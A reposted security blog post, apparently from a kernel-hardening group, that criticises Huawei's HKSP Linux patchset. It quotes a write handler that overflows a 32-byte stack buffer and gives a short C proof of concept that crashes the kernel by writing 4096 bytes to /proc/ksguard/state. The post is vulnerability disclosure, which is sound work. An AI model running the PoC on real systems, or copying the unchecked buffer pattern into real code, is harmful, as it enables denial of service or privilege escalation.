Huawei HKSP Introduces Trivially Exploitable Vulnerability in the Linux Kernel

栏目: IT技术 · 发布时间: 4年前

内容简介:Huawei has seemingly stepped its foot into the kernel-self protection game with the release ofOur focus today in this short blog post will be how the HKSP patchset introduced a trivially exploitable vulnerability due to a complete lack of defensive program

Huawei has seemingly stepped its foot into the kernel-self protection game with the release of HKSP . The patch itself is riddled with bugs and weaknesses and generally lacks any kind of threat model (making its mitigations similar to those present in LKRG where knowledge of the mitigation in place is enough to bypass it). It is not clear if the posted patchset is an official Huawei release or whether this code is already shipping on any Huawei devices, but the patchset uses Huawei in its name, and the Github account for the patchset lists Huawei as the organization for the account.

Our focus today in this short blog post will be how the HKSP patchset introduced a trivially exploitable vulnerability due to a complete lack of defensive programming.

In the patch, a /proc/ksguard/state entry is created. Giving a hint to the level of review of the code, every time this entry is opened or closed, the following lines referencing a nonexistent filename are output to dmesg:

open /proc/ksg_state_proc ok.

close /proc/ksg_state_proc ok.

As we can see in the below line of the patch, the state entry is created with global RWX rights, a sign of carelessness given that the entry doesn't support any meaningful read operation and execute is meaningless on such an entry.

state_proc = proc_create("state", 0777, ksg_proc, &ksg_state_ops);

The ksg_state_write handler for writes to this entry looks like this:

static ssize_t ksg_state_write(struct file *file, const char __user *buf,
                      size_t len, loff_t *offset)
{
	u64 value;
	char tmp[32];
	size_t n = 0;

        if (copy_from_user(tmp, buf, len))
                return -1;

	value = simple_strtoul(tmp, '\0', 10);
	switch (value) {
	case 1:
		ksg_check_keyboard();
		break;
	case 2:
		ksg_check_nf();
		break;
	case 3:
		ksg_check_pointer();
		break;
	case 4:
		ksg_check_sct();
		break;
	default:
		break;
	}

        *offset += len;
        n += len;

        return len;
}

There are a number of issues with this function. First, there is the return -1 which should return a proper errno (generally -EFAULT ). There is an n variable that is assigned to, but not used for anything. There are no checks at all on the value of len . The first issue this causes is acting as a limited oracle. By writing 0 bytes to the entry, the uninitialized tmp array will attempt to have a number parsed out of it and then acted upon. Likewise, writing a full 32 bytes to the entry and failing to NUL-terminate the string will cause simple_strtoul to access out of bounds, potentially operating as a partial oracle for adjacent memory. Most importantly, due to the lack of checks on len , and given that tmp is a simple 32-byte stack array, this introduces a trivially exploitable kernel stack buffer overflow able to be performed by any unprivileged user.

For completeness, a simple PoC is provided below:

#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>

int main(void)
{
        char buf[4096] = { };
        int fd = open("/proc/ksguard/state", O_WRONLY);
        if (fd >= 0) {
		write(fd, buf, sizeof(buf));
		close(fd);
	}
        return 0;
}

Effective security defenses require defined, realistic threat models. Defenses in the kernel should be programmed defensively and with reducing maintenance burdens in mind. The kernel can effectively be thought of as the largest, most vulnerable setuid root binary on the system. New code added to this most-privileged component of the system is potential new attack surface and requires heavy scrutiny, lest worse problems be introduced than were attempted to be solved in the first place.


以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

简约至上

简约至上

[英] Giles Colborne / 李松峰、秦绪文 / 人民邮电出版社 / 2011-1-1 / 35.00

追求简单易用是人类的本性,无论是互联网产品。还是移动应用。亦或其他交互式设计,简单易用始终都是赢得用户的关键。同时,简单易用的程度也与产品寿命的长短密切相关。在《简约至上:交互式设计四策略》中,作者Giles托20多年交互式设计的探索与实践。提出了合理删除、分层组织、适时隐藏和巧妙转移这四个达成简约至上的终极策略,讲述了为什么应该站在主流用户一边,以及如何从他们的真实需求和期望出发,简化设计,提升......一起来看看 《简约至上》 这本书的介绍吧!

JS 压缩/解压工具
JS 压缩/解压工具

在线压缩/解压 JS 代码

RGB转16进制工具
RGB转16进制工具

RGB HEX 互转工具

正则表达式在线测试
正则表达式在线测试

正则表达式在线测试